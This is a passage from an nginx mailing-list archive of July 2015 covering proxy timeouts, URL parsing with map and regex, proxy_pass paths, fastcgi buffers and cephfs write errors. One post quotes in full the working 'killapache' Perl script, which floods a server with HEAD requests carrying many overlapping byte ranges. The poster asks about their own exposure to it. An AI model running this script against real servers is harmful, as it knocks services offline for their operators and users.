upstream Message-ID: <10b1f2df3096cd9c325ed42a0b3b9d38.NginxMailingListEnglish@forum.nginx.org> I have setup Nginx proxy to a Netty server. I am seeing a timeout from upstream, i.e. Netty. The consequence of this timeout is that the JSON payload response is truncated (as seen on browser developer tools) 2015/07/21 05:08:56 [error] 6#0: *19 upstream prematurely closed connection while reading upstream, client: 198.147.191.15, server: sbox-wus-ui.cloudapp.net, request: "GET /api/v1/entities/DEVICE HTTP/1.1", upstream: "http://10.0.3.4:8080/api/v1/entities/DEVICE", host: "sbox-wus-ui.cloudapp.net", referrer: "https://sbox-wus-ui.cloudapp.net/home.html" So, yes I initially thought that this is a Netty issue. However, when I make the same API call on Netty I am able to the retrieve the full JSON payload. The JSON response message size is about 13k. The JSON response I see on the Nginx side is 10K. After spending some time reading up on the Nginx configuration parameters, I added client_body_temp and proxy_temp but to no avail. Any help is really appreciated. Nginx details: nginx version: nginx/1.8.0 built by gcc 4.8.2 20140120 (Red Hat 4.8.2-16) (GCC) built with OpenSSL 1.0.1e-fips 11 Feb 2013 TLS SNI support enabled configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --http-fastcgi-temp-path=/var/cache/nginx/fastcgi_temp --http-uwsgi-temp-path=/var/cache/nginx/uwsgi_temp --http-scgi-temp-path=/var/cache/nginx/scgi_temp --user=nginx --group=nginx --with-http_ssl_module --with-http_realip_module --with-http_addition_module --with-http_sub_module --with-http_dav_module --with-http_flv_module --with-http_mp4_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_random_index_module --with-http_secure_link_module --with-http_stub_status_module --with-http_auth_request_module --with-mail --with-mail_ssl_module --with-file-aio --with-ipv6 --with-http_spdy_module --with-cc-opt='-O2 -g -pipe -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector --param=ssp-buffer-size=4 -m64 -mtune=generic' ----- # For more information on configuration, see: # * Official English Documentation: http://nginx.org/en/docs/ # * Official Russian Documentation: http://nginx.org/ru/docs/ user nginx; worker_processes 1; daemon off; error_log {{logDir}}/error.log; pid /run/nginx.pid; events { worker_connections 1024; } http { include /etc/nginx/mime.types; default_type application/octet-stream; log_format main '$remote_addr - $remote_user [$time_local] "$request" ' '$status $body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for"'; access_log {{logDir}}/access.log main; sendfile on; #tcp_nopush on; #keepalive_timeout 0; keepalive_timeout 65; chunked_transfer_encoding off; # Disable constraints on potential large uploads resulting in HTTP 413 # client_max_body_size 0; #gzip on; index index.html index.htm; upstream netty { {% for netty in servers %} server {{netty}}; {% endfor %} } # Load modular configuration files from the /etc/nginx/conf.d directory. # See http://nginx.org/en/docs/ngx_core_module.html#include # for more information. include /etc/nginx/conf.d/*.conf; server { listen 80; server_name {{serverName}}; rewrite ^ https://$server_name$request_uri? permanent; } server { listen 443 ssl; server_name {{serverName}}; ssl_certificate /data/nginx/cert/{{crtFile}}; ssl_certificate_key /data/nginx/cert/{{keyFile}}; root /usr/share/nginx/html; #charset koi8-r; #access_log /var/log/nginx/host.access.log main; # Load configuration files for the default server block. include /etc/nginx/default.d/*.conf; #The only resource available to check health location /health { root /apps/nginx/f2; index index.html; } location / { client_body_buffer_size 128k; client_body_temp_path /apps/nginx/client_body_temp; proxy_connect_timeout 90; proxy_send_timeout 90; proxy_read_timeout 90; proxy_buffer_size 4k; proxy_buffers 4 32k; proxy_busy_buffers_size 64k; proxy_temp_file_write_size 64k; proxy_temp_path /apps/nginx/proxy_temp; root /apps/nginx/f2; index index.html; {% if basicAuth == "true" %} auth_basic "Restricted"; auth_basic_user_file /data/nginx/cert/htpasswd; {% endif %} } location /ui/ { proxy_pass http://netty; {% if basicAuth == "true" %} auth_basic "Restricted"; auth_basic_user_file /data/nginx/cert/htpasswd; {% endif %} } location /api/ { proxy_pass http://netty; } location /sales/ { root /apps/nginx/f2; index index.html; {% if basicAuth == "true" %} auth_basic "Restricted"; auth_basic_user_file /data/nginx/cert/htpasswd; {% endif %} } # redirect server error pages to the static page /40x.html # error_page 404 /404.html; location = /40x.html { } # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; location = /50x.html { } } } Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260455,260455#msg-260455 From nginx-forum at nginx.us Wed Jul 22 04:43:09 2015 From: nginx-forum at nginx.us (sudharshanr) Date: Wed, 22 Jul 2015 00:43:09 -0400 Subject: Fetching a string by parsing URL Message-ID: I have a web server sitting behind Nginx. If there is an error, then I want to fetch some information from the url and pass it on to a static file as parameters. I have configured Nginx to fetch the query parameters from the url using $arg_param_name. However, I also need to fetch a String from the url path itself. For instance, if the url is "www.website.com/path1/path2?arg1=val&arg2=someval", how can I parse this url to fetch the last path (path2 in this case)? My location directive is as below: location ~*/path1/{ ... } The url, however, need not always have the same number of paths. It can also have 3 paths. So I can't use $1, $2 etc. I need to fetch the last path, i.e the path which is immediately followed by the query parameters (the ? symbol). Is it possible to do this using Nginx directly? Thanks. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260458,260458#msg-260458 From me at myconan.net Wed Jul 22 04:55:30 2015 From: me at myconan.net (Edho Arief) Date: Wed, 22 Jul 2015 13:55:30 +0900 Subject: Fetching a string by parsing URL In-Reply-To: References: Message-ID: On Jul 22, 2015 11:43, "sudharshanr" wrote: > > I have a web server sitting behind Nginx. If there is an error, then I want > to fetch some information from the url and pass it on to a static file as > parameters. I have configured Nginx to fetch the query parameters from the > url using $arg_param_name. > > However, I also need to fetch a String from the url path itself. For > instance, if the url is "www.website.com/path1/path2?arg1=val&arg2=someval ", > how can I parse this url to fetch the last path (path2 in this case)? My > location directive is as below: > > location ~*/path1/{ > ... > } > > The url, however, need not always have the same number of paths. It can also > have 3 paths. So I can't use $1, $2 etc. I need to fetch the last path, i.e > the path which is immediately followed by the query parameters (the ? > symbol). Is it possible to do this using Nginx directly? > this? /([^/]+/?)$ > Thanks. > > Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260458,260458#msg-260458 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Wed Jul 22 06:17:48 2015 From: nginx-forum at nginx.us (sudharshanr) Date: Wed, 22 Jul 2015 02:17:48 -0400 Subject: Fetching a string by parsing URL In-Reply-To: References: Message-ID: <30c01d700548e9ba013aa4afacf32982.NginxMailingListEnglish@forum.nginx.org> Edho Arief: Thanks, but I think I need to rephrase my question. Right now, my nginx.conf looks like this: location ~*/path1/{ if (-f $document_root/error503.html) { return 503; } } error_page 503 ?arg1=$arg_queryparam1&arg2= As you can see, if there is a 503 error, then I return a static file. The arguments to the static file are 1. the param from url whose name is queryparam1, 2. the last path from the url Now how do I fetch the last path from the url and pass it as a param to the static file? I'm new to Nginx, so I might not have understood what you meant. Or is what I'm doing completely wrong? Thanks. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260458,260461#msg-260461 From lists at ruby-forum.com Wed Jul 22 09:26:11 2015 From: lists at ruby-forum.com (Puneeth Kumar) Date: Wed, 22 Jul 2015 11:26:11 +0200 Subject: proxy_pass redirection Message-ID: Hi, I'm new to Nginx and we are using for reverse proxy. I'm able to configured Nginx and it's working but I've challenge in configuring it for Dynamic proxy_pass. I've tried to use wild characters in proxy_pass it's not working, please help. E.G. location server { #listen 443; listen 8080; #server_name analyticstest.isyntax.net; server_name IP; /api/ingestion/ { proxy_set_header HOST $host; proxy_set_header X-Real-IP $remote_addr; proxy_buffers 8 512k; proxy_buffer_size 2024k; proxy_busy_buffers_size 2024k; proxy_read_timeout 3000; add_header Cache-Control no-cache; #rewrite ^/api/query/(.*)$ /$1; proxy_pass http://IP:8881/ingestion/v1.0/streams/NGINEX; (IP: hostname of the server where the service system) In my case, in the above link last word NGINEX can be any other name, so how I can dynamically configure for that word. I tried using wild characters like *, . & _ are not working. Please help. Thank you -- Posted via http://www.ruby-forum.com/. From pchychi at gmail.com Wed Jul 22 12:18:42 2015 From: pchychi at gmail.com (Payam Chychi) Date: Wed, 22 Jul 2015 05:18:42 -0700 Subject: proxy_pass redirection In-Reply-To: References: Message-ID: <32730A860F0E4A7099C66F0C96B92EB3@gmail.com> On Wednesday, July 22, 2015 at 2:26 AM, Puneeth Kumar wrote: > Hi, > I'm new to Nginx and we are using for reverse proxy. > > I'm able to configured Nginx and it's working but I've challenge in > configuring it for Dynamic proxy_pass. I've tried to use wild characters > in proxy_pass it's not working, please help. > > E.G. > location > server { > #listen 443; > listen 8080; > #server_name analyticstest.isyntax.net; > server_name IP; > > /api/ingestion/ { > proxy_set_header HOST $host; > proxy_set_header X-Real-IP $remote_addr; > proxy_buffers 8 512k; > proxy_buffer_size 2024k; > proxy_busy_buffers_size 2024k; > proxy_read_timeout 3000; > add_header Cache-Control no-cache; > #rewrite ^/api/query/(.*)$ /$1; > proxy_pass http://IP:8881/ingestion/v1.0/streams/NGINEX; (IP: > hostname of the server where the service > system) > > In my case, in the above link last word NGINEX can be any other name, so > how I can dynamically configure for that word. > I tried using wild characters like *, . & _ are not working. Please > help. > > Thank you > > -- > Posted via http://www.ruby-forum.com/. > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > Hi, Add a cookie to the session and have the back end route to proper path post cookie check -------------- next part -------------- An HTML attachment was scrubbed... URL: From pchychi at gmail.com Wed Jul 22 12:21:39 2015 From: pchychi at gmail.com (Payam Chychi) Date: Wed, 22 Jul 2015 05:21:39 -0700 Subject: Fetching a string by parsing URL In-Reply-To: References: Message-ID: On Tuesday, July 21, 2015 at 9:43 PM, sudharshanr wrote: > I have a web server sitting behind Nginx. If there is an error, then I want > to fetch some information from the url and pass it on to a static file as > parameters. I have configured Nginx to fetch the query parameters from the > url using $arg_param_name. > > However, I also need to fetch a String from the url path itself. For > instance, if the url is "www.website.com/path1/path2?arg1=val&arg2=someval", > how can I parse this url to fetch the last path (path2 in this case)? My > location directive is as below: > > location ~*/path1/{ > ... > } > > The url, however, need not always have the same number of paths. It can also > have 3 paths. So I can't use $1, $2 etc. I need to fetch the last path, i.e > the path which is immediately followed by the query parameters (the ? > symbol). Is it possible to do this using Nginx directly? > > Thanks. > > Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260458,260458#msg-260458 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > Regex match Might work here? -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Wed Jul 22 17:08:55 2015 From: nginx-forum at nginx.us (sudharshanr) Date: Wed, 22 Jul 2015 13:08:55 -0400 Subject: Fetching a string by parsing URL In-Reply-To: References: Message-ID: <77968d2aafd1fabe3a529517f50f5def.NginxMailingListEnglish@forum.nginx.org> I think I need to rephrase my question. Right now, my nginx.conf looks like this: location ~*/path1/{ if (-f $document_root/error503.html) { return 503; } } error_page 503 ?arg1=$arg_queryparam1&arg2= As you can see, if there is a 503 error, then I return a static file. The arguments to the static file are: 1. the param from url whose name is queryparam1, 2. the last path from the url Now how do I fetch the last path from the url and pass it as a param to the static file? I'm new to Nginx, so I'm not sure if I'm doing this right. Thanks. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260458,260479#msg-260479 From nginx-forum at nginx.us Wed Jul 22 17:48:31 2015 From: nginx-forum at nginx.us (rms) Date: Wed, 22 Jul 2015 13:48:31 -0400 Subject: How to run nginx unit tests? Message-ID: <959ad17460f530675c208f54d8581a99.NginxMailingListEnglish@forum.nginx.org> Hello .. I just built and installed nginx on my Linux system. Are there any unit/smoke/regression tests available to test the install? Thanks for your help. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260481,260481#msg-260481 From mdounin at mdounin.ru Wed Jul 22 17:55:30 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 22 Jul 2015 20:55:30 +0300 Subject: How to run nginx unit tests? In-Reply-To: <959ad17460f530675c208f54d8581a99.NginxMailingListEnglish@forum.nginx.org> References: <959ad17460f530675c208f54d8581a99.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150722175530.GB1500@mdounin.ru> Hello! On Wed, Jul 22, 2015 at 01:48:31PM -0400, rms wrote: > Hello .. I just built and installed nginx on my Linux system. Are there any > unit/smoke/regression tests available to test the install? Our test suite is available at http://hg.nginx.org/nginx-tests/. It is designed for developers though, not for end users. -- Maxim Dounin http://nginx.org/ From me at myconan.net Wed Jul 22 18:11:27 2015 From: me at myconan.net (Edho Arief) Date: Thu, 23 Jul 2015 03:11:27 +0900 Subject: Fetching a string by parsing URL In-Reply-To: <77968d2aafd1fabe3a529517f50f5def.NginxMailingListEnglish@forum.nginx.org> References: <77968d2aafd1fabe3a529517f50f5def.NginxMailingListEnglish@forum.nginx.org> Message-ID: On Thu, Jul 23, 2015 at 2:08 AM, sudharshanr wrote: > I think I need to rephrase my question. Right now, my nginx.conf looks like > this: > > location ~*/path1/{ > if (-f $document_root/error503.html) { > return 503; > } > } > > error_page 503 ?arg1=$arg_queryparam1&arg2= from url> > > As you can see, if there is a 503 error, then I return a static file. The > arguments to the static file are: > 1. the param from url whose name is queryparam1, > 2. the last path from the url > > Now how do I fetch the last path from the url and pass it as a param to the > static file? I'm new to Nginx, so I'm not sure if I'm doing this right. > map $uri $last_path { ~/(?[^/]+)/?$ $pathname; } server { ... error_page ... ...=$last_path; } Note that nothing will see the arguments if the error page is just a static file and not a redirect. From nginx-forum at nginx.us Wed Jul 22 18:16:00 2015 From: nginx-forum at nginx.us (TASM) Date: Wed, 22 Jul 2015 14:16:00 -0400 Subject: Doubt about killapache attack on nginx server Message-ID: <2e0de4c63a418eac02e00ddba0b8bd4f.NginxMailingListEnglish@forum.nginx.org> Hi, I am running nginx 1.0.11 standalone. Recently someone told me that my server is vulnerable to apache killer attack because when he run the following script, it shows "host seems vuln". I searched on this forum and found that "First of all, nginx doesn't favor HEAD requests with compression, so the exact mentioned attack doesn't work against a standalone nginx installation." Also, I checked the source file "src/http/modules/ngx_http_range_filter_module.c", I think it should have been patched to prevent handling malicious range requests. Any idea why it still shows "host seems vuln"? Thanks a lot! ----------------------------------------------------------------- killapache script --------------------------------------------------------------- use IO::Socket; use Parallel::ForkManager; sub usage { print "Apache Remote Denial of Service (memory exhaustion)\n"; print "by Kingcope\n"; print "usage: perl killapache.pl [numforks]\n"; print "example: perl killapache.pl www.example.com 50\n"; } sub killapache { print "ATTACKING $ARGV[0] [using $numforks forks]\n"; $pm = new Parallel::ForkManager($numforks); $|=1; srand(time()); $p = ""; for ($k=0;$k<1300;$k++) { $p .= ",5-$k"; } for ($k=0;$k<$numforks;$k++) { my $pid = $pm->start and next; $x = ""; my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "80", Proto => 'tcp'); $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n"; print $sock $p; while(<$sock>) { } $pm->finish; } $pm->wait_all_children; print ":pPpPpppPpPPppPpppPp\n"; } sub testapache { my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "80", Proto => 'tcp'); $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n"; print $sock $p; $x = <$sock>; if ($x =~ /Partial/) { print "host seems vuln\n"; return 1; } else { return 0; } } if ($#ARGV < 0) { usage; exit; } if ($#ARGV > 1) { $numforks = $ARGV[1]; } else {$numforks = 50;} $v = testapache(); if ($v == 0) { print "Host does not seem vulnerable\n"; exit; } while(1) { killapache(); } Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260485,260485#msg-260485 From nginx-forum at nginx.us Wed Jul 22 18:53:04 2015 From: nginx-forum at nginx.us (rms) Date: Wed, 22 Jul 2015 14:53:04 -0400 Subject: How to run nginx unit tests? In-Reply-To: <20150722175530.GB1500@mdounin.ru> References: <20150722175530.GB1500@mdounin.ru> Message-ID: <13e58dd89ea7af362132361ed037ebed.NginxMailingListEnglish@forum.nginx.org> Thanks Maxim. So from end user's perspective is there something I can do to test the validity of build/install? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260481,260489#msg-260489 From karljohnson.it at gmail.com Wed Jul 22 21:50:12 2015 From: karljohnson.it at gmail.com (Karl Johnson) Date: Wed, 22 Jul 2015 17:50:12 -0400 Subject: Tweak fastcgi_buffer Message-ID: Hello, I need to tweak fastcgi_buffer to 1m on a website that has heavy requests to avoid buffer. If I use a distro with 4096 pagesize, is it better to do 256x 4k or 4x 256k? [root at web ~]# getconf PAGESIZE 4096 [root at web ~]# fastcgi_buffer_size 4k; fastcgi_buffers 256 4k; OR fastcgi_buffer_size 256k; fastcgi_buffers 4 256k; Thanks! Karl -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Wed Jul 22 21:55:12 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 23 Jul 2015 00:55:12 +0300 Subject: Nginx 1.8 proxying to Netty - timeout from upstream In-Reply-To: <10b1f2df3096cd9c325ed42a0b3b9d38.NginxMailingListEnglish@forum.nginx.org> References: <10b1f2df3096cd9c325ed42a0b3b9d38.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150722215512.GD1500@mdounin.ru> Hello! On Tue, Jul 21, 2015 at 03:33:13PM -0400, smuthali wrote: > I have setup Nginx proxy to a Netty server. I am seeing a timeout from > upstream, i.e. Netty. The consequence of this timeout is that the JSON > payload response is truncated (as seen on browser developer tools) > > 2015/07/21 05:08:56 [error] 6#0: *19 upstream prematurely closed connection > while reading upstream, client: 198.147.191.15, server: > sbox-wus-ui.cloudapp.net, request: "GET /api/v1/entities/DEVICE HTTP/1.1", > upstream: "http://10.0.3.4:8080/api/v1/entities/DEVICE", host: > "sbox-wus-ui.cloudapp.net", referrer: > "https://sbox-wus-ui.cloudapp.net/home.html" > > So, yes I initially thought that this is a Netty issue. However, when I make > the same API call on Netty I am able to the retrieve the full JSON payload. > > The JSON response message size is about 13k. The JSON response I see on the > Nginx side is 10K. After spending some time reading up on the Nginx > configuration parameters, I added client_body_temp and proxy_temp but to no > avail. Any help is really appreciated. The message suggests this is a backend problem. If you don't see the problem by directly talking to the backend - this may be because the problem only appears in some specific conditions triggered by nginx, e.g., only when HTTP/1.0 is used. If in doubt, try looking in nginx debug log and/or tcpdump to find out what's going on on the wire. -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Wed Jul 22 23:31:54 2015 From: nginx-forum at nginx.us (sudharshanr) Date: Wed, 22 Jul 2015 19:31:54 -0400 Subject: Fetching a string by parsing URL In-Reply-To: References: Message-ID: For some reason, I'm getting it as null. This is my config file: map $uri $last_path { ~*/(?[^/]+)/?$ $pathname; } server { listen 80; root /basefolder; error_page 500 501 502 503 504 = /error5x.html?name=$arg_name&path=$last_path; location ~*/error5x.html? { alias /error5x.html; } location ~*/path1/ { if (-f $document_root/error503.html) { return 503; } .... } However, if I update the location directive as below: location ~*/error5x.html? { alias /error5x.html?name=$arg_name&path=$last_path; } I get a file not found error. But when I check the nginx log, I can see that it is fetching the $last_path variable. Just that it takes it as part of the file name and throws a 404 error. Thanks. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260458,260498#msg-260498 From lists at ruby-forum.com Thu Jul 23 10:24:39 2015 From: lists at ruby-forum.com (Puneeth Kumar) Date: Thu, 23 Jul 2015 12:24:39 +0200 Subject: proxy_pass redirection In-Reply-To: References: Message-ID: Thank for the quick response. My proxy_pass path will keep on changing as per my topic, so I want to keep to dynamic. Pls check below e.g. proxy_pass http://IP:8881/ingestion/v1.0/streams/NGINEX; or proxy_pass http://IP:8881/ingestion/v1.0/streams/NGINEX1; or proxy_pass http://IP:8881/ingestion/v1.0/streams/NGINEX2; So that last word I want to keep it has dynamic, please help. -- Posted via http://www.ruby-forum.com/. From francis at daoine.org Thu Jul 23 12:14:59 2015 From: francis at daoine.org (Francis Daly) Date: Thu, 23 Jul 2015 13:14:59 +0100 Subject: proxy_pass redirection In-Reply-To: References: Message-ID: <20150723121459.GV23844@daoine.org> On Wed, Jul 22, 2015 at 11:26:11AM +0200, Puneeth Kumar wrote: Hi there, > I'm able to configured Nginx and it's working but I've challenge in > configuring it for Dynamic proxy_pass. I've tried to use wild characters > in proxy_pass it's not working, please help. The proxy_pass documentation is at http://nginx.org/r/proxy_pass. I am not sure what you mean by "dynamic". You want to make one http request of nginx; and you want nginx to make one http request of the proxy_pass upstream server. Can you give some examples of the request you make to nginx, and the request that you want nginx to make of upstream? That might make clearer what it is you want to do. Note that if you use location /one/ { proxy_pass http://upstream/two/; } then if you make a request of /one/abc, nginx will make a request of /two/abc to upstream; and if you make a request of /one/def, nginx will make a request of /two/def to upstream. Is that what you mean by "dynamic"? If so, things should Just Work. If you mean something else, please explain. f -- Francis Daly francis at daoine.org From vedran.furac at gmail.com Thu Jul 23 12:40:58 2015 From: vedran.furac at gmail.com (=?UTF-8?B?VmVkcmFuIEZ1cmHEjQ==?=) Date: Thu, 23 Jul 2015 14:40:58 +0200 Subject: Nginx writing to Cephfs Message-ID: <55B0E0DA.7020808@gmail.com> Hello, I'm having an issue with nginx writing to cephfs. Often I'm getting: writev() "/home/ceph/temp/44/94/1/0000119444" failed (4: Interrupted system call) while reading upstream looking with strace, this happens: ... write(65, "e\314\366\36\302"..., 65536) = ? ERESTARTSYS (To be restarted) It happens after first 4MBs (exactly) are written, subsequent write gets ERESTARTSYS (sometimes, but more rarely, it fails after first 32 or 64MBs, etc are written). Apparently nginx doesn't expect this and doesn't handle it so it cancels writes and deletes this partial file. Looking at the code, I saw it doesn't handle ERESTARTSYS in any different way compared to other write errors. Shouldn't it try to write same data again for a couple of times before finally giving up and erroring out? Do you have any suggestions on how to resolve this? I'm using latest stable nginx. Regards, Vedran From vbart at nginx.com Thu Jul 23 13:44:07 2015 From: vbart at nginx.com (Valentin V. Bartenev) Date: Thu, 23 Jul 2015 16:44:07 +0300 Subject: Nginx writing to Cephfs In-Reply-To: <55B0E0DA.7020808@gmail.com> References: <55B0E0DA.7020808@gmail.com> Message-ID: <4007463.aySMZuG2dP@vbart-workstation> On Thursday 23 July 2015 14:40:58 Vedran Fura? wrote: > Hello, > > I'm having an issue with nginx writing to cephfs. Often I'm getting: > > writev() "/home/ceph/temp/44/94/1/0000119444" failed (4: Interrupted > system call) while reading upstream > > looking with strace, this happens: > > ... > write(65, "e\314\366\36\302"..., 65536) = ? ERESTARTSYS (To be restarted) > > It happens after first 4MBs (exactly) are written, subsequent write gets > ERESTARTSYS (sometimes, but more rarely, it fails after first 32 or > 64MBs, etc are written). Apparently nginx doesn't expect this and > doesn't handle it so it cancels writes and deletes this partial file. > Looking at the code, I saw it doesn't handle ERESTARTSYS in any > different way compared to other write errors. Shouldn't it try to write > same data again for a couple of times before finally giving up and > erroring out? Do you have any suggestions on how to resolve this? I'm > using latest stable nginx. > > It more looks like a bug in cephfs. writev() should never return ERESTARTSYS. wbr, Valentin V. Bartenev From nginx-forum at nginx.us Thu Jul 23 15:46:16 2015 From: nginx-forum at nginx.us (smuthali) Date: Thu, 23 Jul 2015 11:46:16 -0400 Subject: Nginx 1.8 proxying to Netty - timeout from upstream In-Reply-To: <20150722215512.GD1500@mdounin.ru> References: <20150722215512.GD1500@mdounin.ru> Message-ID: Maxim, many thanks for the reply. i did run a tcpdump on nginx port 8080 and dst being Netty. I did not see anything out the ordinary in the packet capture. Essentially i see a HTTP 200 OK for response and the connections are torn down as expected. I wil run another packet capture just in case I overlooked something. Thanks again. Satish Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260455,260522#msg-260522 From nginx-forum at nginx.us Thu Jul 23 18:36:27 2015 From: nginx-forum at nginx.us (sudharshanr) Date: Thu, 23 Jul 2015 14:36:27 -0400 Subject: Fetching a string by parsing URL In-Reply-To: References: Message-ID: <64b34a5c0329127737a1c94e4e2c1d1f.NginxMailingListEnglish@forum.nginx.org> For some reason, I'm getting it as null. This is my config file: map $uri $last_path { ~*/(?[^/]+)/?$ $pathname; } server { listen 80; root /basefolder; error_page 500 501 502 503 504 = /error5x.html?name=$arg_name&path=$last_path; location ~*/error5x.html? { alias /Desktop/error5x.html; } location ~*/path1/ { if (-f $document_root/error503.html) { return 503; } .... } However, if I update the location directive as below: location ~*/error5x.html? { alias ?Desktop/error5x.html?name=$arg_name&path=$last_path; } I get a file not found error. But when I check the nginx log, I can see that it is fetching the $last_path variable. Just that it takes it as part of the file name and throws a 404 error. So it's something like file /Desktop/error5x.html?name=abc&path=xyz not found. Thanks. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260458,260525#msg-260525 From nginx-forum at nginx.us Thu Jul 23 18:51:58 2015 From: nginx-forum at nginx.us (vedranf) Date: Thu, 23 Jul 2015 14:51:58 -0400 Subject: Nginx writing to Cephfs In-Reply-To: <4007463.aySMZuG2dP@vbart-workstation> References: <4007463.aySMZuG2dP@vbart-workstation> Message-ID: <56b3847718c3b907e63f2473dbc50455.NginxMailingListEnglish@forum.nginx.org> Valentin V. Bartenev Wrote: > It more looks like a bug in cephfs. writev() should never return > ERESTARTSYS. I've talked to the ceph people, they say ERESTARTSYS shows up in strace output but it is handled by the kernel and that writev(2) is interrupted by the SIGALRM, which actually appears in the strace output just after writev fails. I also failed to get this error by doing the same this as nginx using dd, dd always succeeded so it happens due to combination of nginx and cephfs. Here's full strace output (2 examples from 2 differently configured servers): http://pastebin.com/wUAAcdT7 http://pastebin.com/wHyWc9U5 Thanks, Vedran Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260512,260527#msg-260527 From mdounin at mdounin.ru Thu Jul 23 19:21:24 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 23 Jul 2015 22:21:24 +0300 Subject: Tweak fastcgi_buffer In-Reply-To: References: Message-ID: <20150723192124.GB19190@mdounin.ru> Hello! On Wed, Jul 22, 2015 at 05:50:12PM -0400, Karl Johnson wrote: > Hello, > > I need to tweak fastcgi_buffer to 1m on a website that has heavy requests > to avoid buffer. If I use a distro with 4096 pagesize, is it better to do > 256x 4k or 4x 256k? > > [root at web ~]# getconf PAGESIZE > 4096 > [root at web ~]# > > fastcgi_buffer_size 4k; > fastcgi_buffers 256 4k; > > OR > > fastcgi_buffer_size 256k; > fastcgi_buffers 4 256k; I would recommend the latter. Or, alternatively, something like fastcgi_buffers 8 128k; Too many small buffers will result in extra processing overhead, and it's unlikely to be a good solution. -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Thu Jul 23 19:32:26 2015 From: nginx-forum at nginx.us (sudharshanr) Date: Thu, 23 Jul 2015 15:32:26 -0400 Subject: Fetching a string by parsing URL In-Reply-To: References: Message-ID: <47162e390120903faa9cbe3acbc9f890.NginxMailingListEnglish@forum.nginx.org> For some reason, I'm getting it as null. This is my config file: map $uri $last_path { ~*/(?[^/]+)/?$ $pathname; } server { listen 80; root /basefolder; error_page 500 501 502 503 504 = /error5x.html?name=$arg_name&path=$last_path; location ~*/error5x.html? { alias /Desktop/error5x.html; } location ~*/path1/ { if (-f $document_root/error503.html) { return 503; } .... } However, if I update the location directive as below: location ~*/error5x.html? { alias /Desktop/error5x.html?name=$arg_name&path=$last_path; } I get a file not found error. But when I check the nginx log, I can see that it is fetching the $last_path variable. Just that it takes it as part of the file name and throws a 404 error. So it's something like "open() "/Desktop/error5x.html?name=abc&path=xyz" failed (2: No such file or directory),". Thanks. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260458,260531#msg-260531 From lists at ruby-forum.com Fri Jul 24 09:16:12 2015 From: lists at ruby-forum.com (Puneeth Kumar) Date: Fri, 24 Jul 2015 11:16:12 +0200 Subject: proxy_pass redirection In-Reply-To: References: Message-ID: Thank you Francis for the links & the solution. Sorry for confusion, proxy_pass is working for me. I'm passing below link (exact URI) to proxy_pass http://IP:8881/ingestion/v1.0/streams/NGINEX. I want to keep the link(URI) only till http://IP:8881/ingestion/v1.0/streams/ & the last word (NGINX) application should pick. So Can I pass * type of wild char to the link? please help. http://IP:8881/ingestion/v1.0/streams/* Thank you -- Posted via http://www.ruby-forum.com/. From nginx-forum at nginx.us Fri Jul 24 13:40:03 2015 From: nginx-forum at nginx.us (vedranf) Date: Fri, 24 Jul 2015 09:40:03 -0400 Subject: Nginx writing to Cephfs In-Reply-To: <4007463.aySMZuG2dP@vbart-workstation> References: <4007463.aySMZuG2dP@vbart-workstation> Message-ID: <6d65568154ecd491a4f7a905a1f3110c.NginxMailingListEnglish@forum.nginx.org> Hello, So Ceph devs final reply was: "ngx_write_fd() is just a write(), which, when interrupted by SIGALRM, fails with EINTR because SA_RESTART is not set. We can try digging further, but I think nginx should retry in this case." Let me know what do you think. Thanks, Vedran Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260512,260540#msg-260540 From nginx-forum at nginx.us Fri Jul 24 13:40:40 2015 From: nginx-forum at nginx.us (khav) Date: Fri, 24 Jul 2015 09:40:40 -0400 Subject: keepalive_timeout timeout causes high TTFB Message-ID: <0a1ca52bf9ba4f0ceb9e1eeb98cb2a76.NginxMailingListEnglish@forum.nginx.org> I am trying to further optimize SSL but if i enable keepalive_timeout i get high TTFB as shown in the report below http://tools.pingdom.com/fpt/#!/KggzF When i disable keepalive_timeout , TTFB is fixed but nginx recommand keepalive_timeout : 